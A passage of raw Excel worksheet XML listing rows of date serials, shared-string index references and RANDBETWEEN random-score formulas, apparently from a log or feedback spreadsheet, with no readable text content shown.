        <v>17</v>
      </c>
      <c r="E21437" t="s">
        <v>19316</v>
      </c>
      <c r="F21437">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21438" s="1">
        <v>43077.534432870372</v>
      </c>
      <c r="C21438" t="s">
        <v>6</v>
      </c>
      <c r="D21438" t="s">
        <v>2139</v>
      </c>
      <c r="E21438" t="s">
        <v>19317</v>
      </c>
      <c r="F21438">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21439" s="1">
        <v>43077.499861111108</v>
      </c>
      <c r="C21439" t="s">
        <v>10</v>
      </c>
      <c r="D21439" t="s">
        <v>494</v>
      </c>
      <c r="E21439" t="s">
        <v>19318</v>
      </c>
      <c r="F21439">
        <f t="shared" ca="1" si="334"/>
        <v>2</v>
      </c>
    </row>
    <row r="21440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21440" s="1">
        <v>43077.491238425922</v>
      </c>
      <c r="C21440" t="s">
        <v>10</v>
      </c>
      <c r="D21440" t="s">
        <v>112</v>
      </c>
      <c r="E21440" t="s">
        <v>19319</v>
      </c>
      <c r="F21440">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21441" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A21441" s="1">
        <v>43077.475023148145</v>
      </c>
      <c r="C21441" t="s">
        <v>10</v>
      </c>
      <c r="D21441" t="s">
        <v>80</v>
      </c>
      <c r="E21441" s="2" t="s">
        <v>19320</v>
      </c>
      <c r="F21441">
        <f t="shared" ca="1" si="334"/>
        <v>1</v>
      </c>
    </row>
    <row r="21442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21442" s="1">
        <v>43077.469560185185</v>
      </c>
      <c r="C21442" t="s">
        <v>10</v>
      </c>
      <c r="D21442" t="s">
        <v>6</v>
      </c>
      <c r="E21442" t="s">
        <v>19321</v>
      </c>
      <c r="F21442">
        <f t="shared" ref="F21442:F21505" ca="1" si="335">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="21443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21443" s="1">
        <v>43077.436273148145</v>
      </c>
      <c r="C21443" t="s">
        <v>6</v>
      </c>
      <c r="D21443" t="s">
        <v>25</v>
      </c>
      <c r="E21443" t="s">
        <v>19322</v>
      </c>
      <c r="F21443">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21444" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21444" s="1">
        <v>43077.429884259262</v>
      </c>
      <c r="C21444" t="s">
        <v>836</v>
      </c>
      <c r="E21444" s="2" t="s">
        <v>19323</v>
      </c>
      <c r="F21444">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21445" s="1">
        <v>43077.425740740742</v>
      </c>
      <c r="C21445" t="s">
        <v>65</v>
      </c>
      <c r="E21445" t="s">
        <v>19324</v>
      </c>
      <c r="F21445">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21446" s="1">
        <v>43077.379236111112</v>
      </c>
      <c r="C21446" t="s">
        <v>124</v>
      </c>
      <c r="E21446" t="s">
        <v>19325</v>
      </c>
      <c r="F21446">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21447" s="1">
        <v>43077.249305555553</v>
      </c>
      <c r="C21447" t="s">
        <v>41</v>
      </c>
      <c r="E21447" t="s">
        <v>19326</v>
      </c>
      <c r="F21447">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21448" s="1">
        <v>43077.239155092589</v>
      </c>
      <c r="C21448" t="s">
        <v>344</v>
      </c>
      <c r="E21448" t="s">
        <v>19327</v>
      </c>
      <c r="F21448">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21449" s="1">
        <v>43077.219027777777</v>
      </c>
      <c r="C21449" t="s">
        <v>16</v>
      </c>
      <c r="E21449" t="s">
        <v>19328</v>
      </c>
      <c r="F21449">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21450" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21450" s="1">
        <v>43077.116550925923</v>
      </c>
      <c r="C21450" t="s">
        <v>50</v>
      </c>
      <c r="E21450" s="2" t="s">
        <v>19329</v>
      </c>
      <c r="F21450">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21451" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21451" s="1">
        <v>43077.038182870368</v>
      </c>
      <c r="C21451" t="s">
        <v>71</v>
      </c>
      <c r="E21451" s="2" t="s">
        <v>19330</v>
      </c>
      <c r="F21451">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21452" s="1">
        <v>43076.717164351852</v>
      </c>
      <c r="C21452" t="s">
        <v>10</v>
      </c>
      <c r="D21452" t="s">
        <v>158</v>
      </c>
      <c r="E21452" t="s">
        <v>19331</v>
      </c>
      <c r="F21452">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21453" s="1">
        <v>43076.679097222222</v>
      </c>
      <c r="C21453" t="s">
        <v>10</v>
      </c>
      <c r="D21453" t="s">
        <v>163</v>
      </c>
      <c r="E21453" t="s">
        <v>19332</v>
      </c>
      <c r="F21453">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21454" s="1">
        <v>43076.639363425929</v>
      </c>
      <c r="C21454" t="s">
        <v>10</v>
      </c>
      <c r="D21454" t="s">
        <v>163</v>
      </c>
      <c r="E21454" t="s">
        <v>19333</v>
      </c>
      <c r="F21454">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21455" s="1">
        <v>43076.634895833333</v>
      </c>
      <c r="C21455" t="s">
        <v>10</v>
      </c>
      <c r="D21455" t="s">
        <v>71</v>
      </c>
      <c r="E21455" t="s">
        <v>19334</v>
      </c>
      <c r="F21455">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21456" s="1">
        <v>43076.634571759256</v>
      </c>
      <c r="C21456" t="s">
        <v>10</v>
      </c>
      <c r="D21456" t="s">
        <v>89</v>
      </c>
      <c r="E21456" t="s">
        <v>19335</v>
      </c>
      <c r="F21456">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21457" s="1">
        <v>43076.612604166665</v>
      </c>
      <c r="C21457" t="s">
        <v>10</v>
      </c>
      <c r="D21457" t="s">
        <v>163</v>
      </c>
      <c r="E21457" t="s">
        <v>19336</v>
      </c>
      <c r="F21457">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21458" s="1">
        <v>43076.596689814818</v>
      </c>
      <c r="C21458" t="s">
        <v>10</v>
      </c>
      <c r="D21458" t="s">
        <v>151</v>
      </c>
      <c r="E21458" t="s">
        <v>19337</v>
      </c>
      <c r="F21458">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21459" s="1">
        <v>43076.571921296294</v>
      </c>
      <c r="C21459" t="s">
        <v>10</v>
      </c>
      <c r="D21459" t="s">
        <v>158</v>
      </c>
      <c r="E21459" t="s">
        <v>19338</v>
      </c>
      <c r="F21459">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21460" s="1">
        <v>43076.567187499997</v>
      </c>
      <c r="C21460" t="s">
        <v>10</v>
      </c>
      <c r="D21460" t="s">
        <v>112</v>
      </c>
      <c r="E21460" t="s">
        <v>19339</v>
      </c>
      <c r="F21460">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21461" s="1">
        <v>43076.538252314815</v>
      </c>
      <c r="C21461" t="s">
        <v>10</v>
      </c>
      <c r="D21461" t="s">
        <v>112</v>
      </c>
      <c r="E21461" t="s">
        <v>19340</v>
      </c>
      <c r="F21461">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21462" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21462" s="1">
        <v>43076.490208333336</v>
      </c>
      <c r="C21462" t="s">
        <v>6</v>
      </c>
      <c r="D21462" t="s">
        <v>25</v>
      </c>
      <c r="E21462" s="2" t="s">
        <v>19341</v>
      </c>
      <c r="F21462">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21463" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21463" s="1">
        <v>43076.472303240742</v>
      </c>
      <c r="C21463" t="s">
        <v>6</v>
      </c>
      <c r="D21463" t="s">
        <v>25</v>
      </c>
      <c r="E21463" s="2" t="s">
        <v>19342</v>
      </c>
      <c r="F21463">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21464" s="1">
        <v>43076.46429398148</v>
      </c>
      <c r="C21464" t="s">
        <v>10</v>
      </c>
      <c r="D21464" t="s">
        <v>271</v>
      </c>
      <c r="E21464" t="s">
        <v>19343</v>
      </c>
      <c r="F21464">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21465" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21465" s="1">
        <v>43076.45453703704</v>
      </c>
      <c r="C21465" t="s">
        <v>6</v>
      </c>
      <c r="D21465" t="s">
        <v>194</v>
      </c>
      <c r="E21465" s="2" t="s">
        <v>19344</v>
      </c>
      <c r="F21465">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21466" s="1">
        <v>43076.453634259262</v>
      </c>
      <c r="C21466" t="s">
        <v>10</v>
      </c>
      <c r="D21466" t="s">
        <v>41</v>
      </c>
      <c r="E21466" t="s">
        <v>19345</v>
      </c>
      <c r="F21466">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21467" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21467" s="1">
        <v>43076.426793981482</v>
      </c>
      <c r="C21467" t="s">
        <v>10</v>
      </c>
      <c r="D21467" t="s">
        <v>56</v>
      </c>
      <c r="E21467" s="2" t="s">
        <v>19346</v>
      </c>
      <c r="F21467">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21468" s="1">
        <v>43076.420787037037</v>
      </c>
      <c r="C21468" t="s">
        <v>10</v>
      </c>
      <c r="D21468" t="s">
        <v>11</v>
      </c>
      <c r="E21468" t="s">
        <v>19347</v>
      </c>
      <c r="F21468">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21469" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21469" s="1">
        <v>43076.399560185186</v>
      </c>
      <c r="C21469" t="s">
        <v>559</v>
      </c>
      <c r="E21469" s="2" t="s">
        <v>19348</v>
      </c>
      <c r="F21469">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21470" s="1">
        <v>43076.314791666664</v>
      </c>
      <c r="C21470" t="s">
        <v>10</v>
      </c>
      <c r="D21470" t="s">
        <v>112</v>
      </c>
      <c r="E21470" t="s">
        <v>19349</v>
      </c>
      <c r="F21470">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21471" s="1">
        <v>43076.300509259258</v>
      </c>
      <c r="C21471" t="s">
        <v>60</v>
      </c>
      <c r="E21471" t="s">
        <v>19350</v>
      </c>
      <c r="F21471">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21472" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21472" s="1">
        <v>43076.28833333333</v>
      </c>
      <c r="C21472" t="s">
        <v>50</v>
      </c>
      <c r="E21472" s="2" t="s">
        <v>19351</v>
      </c>
      <c r="F21472">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21473" s="1">
        <v>43076.276319444441</v>
      </c>
      <c r="C21473" t="s">
        <v>189</v>
      </c>
      <c r="E21473" t="s">
        <v>19352</v>
      </c>
      <c r="F21473">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21474" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21474" s="1">
        <v>43076.269780092596</v>
      </c>
      <c r="C21474" t="s">
        <v>16</v>
      </c>
      <c r="E21474" s="2" t="s">
        <v>19353</v>
      </c>
      <c r="F21474">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21475" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21475" s="1">
        <v>43076.263356481482</v>
      </c>
      <c r="C21475" t="s">
        <v>454</v>
      </c>
      <c r="D21475" t="s">
        <v>1091</v>
      </c>
      <c r="E21475" s="2" t="s">
        <v>19354</v>
      </c>
      <c r="F21475">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21476" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21476" s="1">
        <v>43076.206342592595</v>
      </c>
      <c r="C21476" t="s">
        <v>1050</v>
      </c>
      <c r="E21476" s="2" t="s">
        <v>19355</v>
      </c>
      <c r="F21476">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21477" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21477" s="1">
        <v>43076.1953587963</v>
      </c>
      <c r="C21477" t="s">
        <v>48</v>
      </c>
      <c r="E21477" s="2" t="s">
        <v>19356</v>
      </c>
      <c r="F21477">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21478" s="1">
        <v>43076.125405092593</v>
      </c>
      <c r="C21478" t="s">
        <v>41</v>
      </c>
      <c r="E21478" t="s">
        <v>19357</v>
      </c>
      <c r="F21478">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21479" s="1">
        <v>43076.124791666669</v>
      </c>
      <c r="C21479" t="s">
        <v>41</v>
      </c>
      <c r="E21479" t="s">
        <v>19358</v>
      </c>
      <c r="F21479">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21480" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21480" s="1">
        <v>43076.122291666667</v>
      </c>
      <c r="C21480" t="s">
        <v>50</v>
      </c>
      <c r="E21480" s="2" t="s">
        <v>19359</v>
      </c>
      <c r="F21480">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21481" s="1">
        <v>43076.107222222221</v>
      </c>
      <c r="C21481" t="s">
        <v>41</v>
      </c>
      <c r="E21481" t="s">
        <v>19360</v>
      </c>
      <c r="F21481">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21482" s="1">
        <v>43076.103449074071</v>
      </c>
      <c r="C21482" t="s">
        <v>41</v>
      </c>
      <c r="E21482" t="s">
        <v>19361</v>
      </c>
      <c r="F21482">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21483" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21483" s="1">
        <v>43076.089768518519</v>
      </c>
      <c r="C21483" t="s">
        <v>124</v>
      </c>
      <c r="E21483" s="2" t="s">
        <v>19362</v>
      </c>
      <c r="F21483">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21484" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21484" s="1">
        <v>43076.064328703702</v>
      </c>
      <c r="C21484" t="s">
        <v>140</v>
      </c>
      <c r="D21484" t="s">
        <v>141</v>
      </c>
      <c r="E21484" s="2" t="s">
        <v>19363</v>
      </c>
      <c r="F21484">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21485" s="1">
        <v>43076.049270833333</v>
      </c>
      <c r="C21485" t="s">
        <v>60</v>
      </c>
      <c r="E21485" t="s">
        <v>19364</v>
      </c>
      <c r="F21485">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21486" s="1">
        <v>43076.041851851849</v>
      </c>
      <c r="C21486" t="s">
        <v>2210</v>
      </c>
      <c r="E21486" t="s">
        <v>19365</v>
      </c>
      <c r="F21486">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21487" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21487" s="1">
        <v>43076.018923611111</v>
      </c>
      <c r="C21487" t="s">
        <v>10</v>
      </c>
      <c r="D21487" t="s">
        <v>17</v>
      </c>
      <c r="E21487" s="2" t="s">
        <v>19366</v>
      </c>
      <c r="F21487">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21488" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21488" s="1">
        <v>43075.773333333331</v>
      </c>
      <c r="C21488" t="s">
        <v>6</v>
      </c>
      <c r="D21488" t="s">
        <v>821</v>
      </c>
      <c r="E21488" s="2" t="s">
        <v>19367</v>
      </c>
      <c r="F21488">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21489" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21489" s="1">
        <v>43075.755682870367</v>
      </c>
      <c r="C21489" t="s">
        <v>10</v>
      </c>
      <c r="D21489" t="s">
        <v>17</v>
      </c>
      <c r="E21489" s="2" t="s">
        <v>19368</v>
      </c>
      <c r="F21489">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21490" s="1">
        <v>43075.714386574073</v>
      </c>
      <c r="C21490" t="s">
        <v>10</v>
      </c>
      <c r="D21490" t="s">
        <v>89</v>
      </c>
      <c r="E21490" t="s">
        <v>19369</v>
      </c>
      <c r="F21490">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21491" s="1">
        <v>43075.707453703704</v>
      </c>
      <c r="C21491" t="s">
        <v>10</v>
      </c>
      <c r="D21491" t="s">
        <v>6</v>
      </c>
      <c r="E21491" t="s">
        <v>19370</v>
      </c>
      <c r="F21491">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21492" s="1">
        <v>43075.704270833332</v>
      </c>
      <c r="C21492" t="s">
        <v>6</v>
      </c>
      <c r="D21492" t="s">
        <v>25</v>
      </c>
      <c r="E21492" t="s">
        <v>19371</v>
      </c>
      <c r="F21492">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21493" s="1">
        <v>43075.68959490741</v>
      </c>
      <c r="C21493" t="s">
        <v>10</v>
      </c>
      <c r="D21493" t="s">
        <v>6</v>
      </c>
      <c r="F21493">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21494" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21494" s="1">
        <v>43075.684548611112</v>
      </c>
      <c r="C21494" t="s">
        <v>6</v>
      </c>
      <c r="D21494" t="s">
        <v>25</v>
      </c>
      <c r="E21494" s="2" t="s">
        <v>19372</v>
      </c>
      <c r="F21494">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21495" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21495" s="1">
        <v>43075.67800925926</v>
      </c>
      <c r="C21495" t="s">
        <v>10</v>
      </c>
      <c r="D21495" t="s">
        <v>251</v>
      </c>
      <c r="E21495" s="2" t="s">
        <v>19373</v>
      </c>
      <c r="F21495">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21496" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21496" s="1">
        <v>43075.66673611111</v>
      </c>
      <c r="C21496" t="s">
        <v>10</v>
      </c>
      <c r="D21496" t="s">
        <v>52</v>
      </c>
      <c r="E21496" s="2" t="s">
        <v>19374</v>
      </c>
      <c r="F21496">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21497" s="1">
        <v>43075.655856481484</v>
      </c>
      <c r="C21497" t="s">
        <v>10</v>
      </c>
      <c r="D21497" t="s">
        <v>36</v>
      </c>
      <c r="E21497" t="s">
        <v>19375</v>
      </c>
      <c r="F21497">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21498" s="1">
        <v>43075.603958333333</v>
      </c>
      <c r="C21498" t="s">
        <v>10</v>
      </c>
      <c r="D21498" t="s">
        <v>667</v>
      </c>
      <c r="E21498" t="s">
        <v>19376</v>
      </c>
      <c r="F21498">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21499" s="1">
        <v>43075.597696759258</v>
      </c>
      <c r="C21499" t="s">
        <v>10</v>
      </c>
      <c r="D21499" t="s">
        <v>20</v>
      </c>
      <c r="E21499" t="s">
        <v>19377</v>
      </c>
      <c r="F21499">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21500" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21500" s="1">
        <v>43075.585289351853</v>
      </c>
      <c r="C21500" t="s">
        <v>10</v>
      </c>
      <c r="D21500" t="s">
        <v>36</v>
      </c>
      <c r="E21500" s="2" t="s">
        <v>19378</v>
      </c>
      <c r="F21500">
        <f t="shared" ca="1" si="335"/>
        <v>2</v>
      </c>
    </row>
    <row r="21501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21501" s="1">
        <v>43075.575613425928</v>
      </c>
      <c r="C21501" t="s">
        <v>60</v>
      </c>
      <c r="E21501" t="s">
        <v>19379</v>
      </c>
      <c r="F21501">
        <f t="shared" ca="1" si="335"/>
        <v>5</v>
      </c>
    </row>
    <row r="21502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21502" s="1">
        <v>43075.567523148151</v>
      </c>
      <c r="C21502" t="s">
        <v>10</v>
      </c>
      <c r="D21502" t="s">
        <v>36</v>
      </c>
      <c r="E21502" t="s">
        <v>19380</v>
      </c>
      <c r="F21502">
        <f t="shared" ca="1" si="335"/>
        <v>1</v>
      </c>
    </row>
    <row r="21503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21503" s="1">
        <v>43075.550740740742</v>
      </c>
      <c r="C21503" t="s">
        <v>10</v>
      </c>
      <c r="D21503" t="s">
        <v>112</v>
      </c>
      <c r="E21503" t="s">
        <v>19381</v>
      </c>
      <c r="F21503">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21504" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21504" s="1">
        <v>43075.54047453704</v>
      </c>
      <c r="C21504" t="s">
        <v>65</v>
      </c>
      <c r="E21504" s="2" t="s">
        <v>19382</v>
      </c>
      <c r="F21504">
        <f t="shared" ca="1" si="335"/>
        <v>4</v>
      </c>
    </row>
    <row r="21505" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A21505" s="1">
        <v>43075.528067129628</v>
      </c>
      <c r="C21505" t="s">
        <v>10</v>
      </c>
      <c r="D21505" t="s">
        <v>163</v>
      </c>
      <c r="E21505" s="2" t="s">
        <v>19383</v>
      </c>
      <c r="F21505">
        <f t="shared" ca="1" si="335"/>
        <v>3</v>
      </c>
    </row>
    <row r="21506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21506" s="1">
        <v>43075.495717592596</v>
      </c>
      <c r="C21506" t="s">
        <v>63</v>
      </c>
      <c r="E21506" t="s">
        <v>19384</v>
      </c>
      <c r="F21506">
        <f t="shared" ref="F21506:F21569" ca="1" si="336">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="21507" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21507" s="1">
        <v>43075.486076388886</v>
      </c>
      <c r="C21507" t="s">
        <v>10</v>
      </c>
      <c r="D21507" t="s">
        <v>192</v>
      </c>
      <c r="E21507" s="2" t="s">
        <v>19385</v>
      </c>
      <c r="F21507">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21508" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21508" s="1">
        <v>43075.478194444448</v>
      </c>
      <c r="C21508" t="s">
        <v>65</v>
      </c>
      <c r="E21508" s="2" t="s">
        <v>19386</v>
      </c>
      <c r="F21508">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21509" s="1">
        <v>43075.476805555554</v>
      </c>
      <c r="C21509" t="s">
        <v>10</v>
      </c>
      <c r="D21509" t="s">
        <v>36</v>
      </c>
      <c r="E21509" t="s">
        <v>19387</v>
      </c>
      <c r="F21509">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21510" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A21510" s="1">
        <v>43075.44871527778</v>
      </c>
      <c r="C21510" t="s">
        <v>48</v>
      </c>
      <c r="D21510" t="s">
        <v>312</v>
      </c>
      <c r="E21510" s="2" t="s">
        <v>19388</v>
      </c>
      <c r="F21510">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21511" s="1">
        <v>43075.372395833336</v>
      </c>
      <c r="C21511" t="s">
        <v>10</v>
      </c>
      <c r="D21511" t="s">
        <v>23</v>
      </c>
      <c r="E21511" t="s">
        <v>19389</v>
      </c>
      <c r="F21511">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21512" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21512" s="1">
        <v>43075.369953703703</v>
      </c>
      <c r="C21512" t="s">
        <v>71</v>
      </c>
      <c r="E21512" s="2" t="s">
        <v>19390</v>
      </c>
      <c r="F21512">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21513" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21513" s="1">
        <v>43075.345879629633</v>
      </c>
      <c r="C21513" t="s">
        <v>16</v>
      </c>
      <c r="E21513" s="2" t="s">
        <v>19391</v>
      </c>
      <c r="F21513">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21514" s="1">
        <v>43075.330706018518</v>
      </c>
      <c r="C21514" t="s">
        <v>41</v>
      </c>
      <c r="E21514" t="s">
        <v>19392</v>
      </c>
      <c r="F21514">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21515" s="1">
        <v>43075.304108796299</v>
      </c>
      <c r="C21515" t="s">
        <v>48</v>
      </c>
      <c r="E21515" t="s">
